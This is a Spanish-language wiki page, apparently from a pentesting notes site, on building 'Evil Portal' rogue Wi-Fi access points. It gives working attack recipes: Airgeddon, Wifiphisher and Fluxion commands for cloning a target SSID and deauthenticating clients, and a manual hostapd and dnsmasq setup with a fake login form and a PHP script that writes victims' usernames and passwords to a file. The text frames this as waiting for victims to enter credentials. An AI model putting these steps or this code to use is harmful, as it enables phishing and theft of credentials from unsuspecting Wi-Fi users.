🌐Evil Portal

¿Qué es un Evil Portal?

Un Evil Portal es una técnica utilizada en ataques de red donde se crea un punto de acceso falso que imita una red legítima. Los atacantes configuran este portal malicioso para engañar a los usuarios y hacer que se conecten a él, permitiéndoles capturar credenciales sensibles, información privada y otros datos personales. Este método es comúnmente implementado utilizando herramientas de auditoría de seguridad como las incluidas en Kali Linux, y es especialmente efectivo en entornos donde los usuarios no verifican la autenticidad de las redes a las que se conectan.

Si tienes un adaptador de red en modo monitor, puedes usar herramientas incluidas en Kali Linux como Airgeddon, Wifiphisher, Fluxion o Rogue-AP (manual con Hostapd y Dnsmasq) para crear un Evil Portal

Airgeddon

Airgeddon es una de las mejores opciones, ya que automatiza ataques MITM y Evil Portals.

GitHub - v1s1t0r1sh3r3/airgeddon: This is a multi-use bash script for Linux systems to audit wireless networks.GitHub

Instalar Airgeddon

git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
cd airgeddon
sudo bash airgeddon.sh

Iniciar el Ataque

Ejecuta Airgeddon y selecciona tu adaptador en modo monitor.
Ve a la opción Rogue AP Attack > Evil Twin Attack.
Elige una red WiFi objetivo y clona su SSID.
Activa el Evil Portal y elige una plantilla (puedes personalizarla).
Inicia el ataque y espera a que las víctimas ingresen credenciales.

✅ Ventaja: Automatización total, soporte para Evil Portals personalizables.

Wifiphisher

Wifiphisher crea un Access Point falso y redirige a los usuarios a una página de phishing automáticamente.

GitHub - wifiphisher/wifiphisher: The Rogue Access Point FrameworkGitHub

Instalar Wifiphisher

sudo apt update && sudo apt install wifiphisher -y

Iniciar el Ataque

sudo wifiphisher --essid "WiFi Gratis" --phishing-page firmware-upgrade

📌 Esto creará un punto de acceso falso y mostrará una página falsa de actualización de firmware para capturar credenciales.

✅ Ventaja: Muy rápido y fácil de usar.

Fluxion

Fluxion usa un ataque Evil Twin para desautenticar a los clientes y redirigirlos a un portal cautivo falso.

GitHub - FluxionNetwork/fluxion: Fluxion is a remake of linset by vk496 with enhanced functionality.GitHub

Instalar Fluxion

git clone https://github.com/FluxionNetwork/fluxion.git
cd fluxion
sudo bash fluxion.sh

Guia del Captive Portal

Captive Portal AttackGitHub

Iniciar el Ataque

Selecciona "Evil Twin Attack".
Clona el SSID de la red objetivo.
Activa el deautenticador para forzar a los usuarios a reconectarse.
Usa Captive Portal con una página falsa de autenticación.
Captura credenciales en tiempo real.

✅ Ventaja: Redirección con portales cautivos, fácil de configurar.

Rogue AP Manual con Hostapd + Dnsmasq + Apache

Si quieres hacerlo manualmente, puedes configurar un Rogue Access Point con Hostapd, Dnsmasq y Apache.

1️⃣ Instalar Dependencias

sudo apt install hostapd dnsmasq apache2 php -y

2️⃣ Configurar Hostapd

Edita el archivo /etc/hostapd/hostapd.conf:

interface=wlan0
driver=nl80211
ssid=WiFi Gratis
hw_mode=g
channel=6
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=password123

Inicia el AP:

sudo hostapd /etc/hostapd/hostapd.conf

Configurar DHCP y Redirección con Dnsmasq

Edita /etc/dnsmasq.conf:

interface=wlan0
dhcp-range=192.168.1.2,192.168.1.100,12h
address=/#/192.168.1.1

Inicia Dnsmasq:

sudo systemctl restart dnsmasq

Configurar el Evil Portal en Apache

Edita /var/www/html/index.html:

<form action="login.php" method="post">
    <input type="text" name="username" placeholder="Usuario">
    <input type="password" name="password" placeholder="Contraseña">
    <input type="submit" value="Iniciar sesión">
</form>

Edita /var/www/html/login.php:

<?php
$file = fopen("creds.txt", "a");
fwrite($file, "Usuario: ".$_POST['username']." | Contraseña: ".$_POST['password']."\n");
fclose($file);
header('Location: https://google.com');
exit();
?>

Otorga permisos:

sudo chmod 777 /var/www/html/creds.txt

Iniciar el Evil Portal

sudo systemctl restart apache2

📌 Ahora cualquier usuario que se conecte verá la página falsa y sus credenciales se guardarán en creds.txt.

✅ Ventaja: Control total sobre la configuración y personalización.

AnteriorWifite SiguienteRainbow Table

Última actualización hace 11 meses

hashtag¿Qué es un Evil Portal?

hashtagAirgeddon

hashtagInstalar Airgeddon

hashtagIniciar el Ataque

hashtagWifiphisher

hashtagInstalar Wifiphisher

hashtagIniciar el Ataque

hashtagFluxion

hashtagInstalar Fluxion

hashtagGuia del Captive Portal

hashtagIniciar el Ataque

hashtagRogue AP Manual con Hostapd + Dnsmasq + Apache

hashtag1️⃣ Instalar Dependencias

hashtag2️⃣ Configurar Hostapd

hashtagConfigurar DHCP y Redirección con Dnsmasq

hashtagConfigurar el Evil Portal en Apache

hashtagIniciar el Evil Portal

¿Qué es un Evil Portal?

Airgeddon

Instalar Airgeddon

Iniciar el Ataque

Wifiphisher

Instalar Wifiphisher

Iniciar el Ataque

Fluxion

Instalar Fluxion

Guia del Captive Portal

Iniciar el Ataque

Rogue AP Manual con Hostapd + Dnsmasq + Apache

1️⃣ Instalar Dependencias

2️⃣ Configurar Hostapd

Configurar DHCP y Redirección con Dnsmasq

Configurar el Evil Portal en Apache

Iniciar el Evil Portal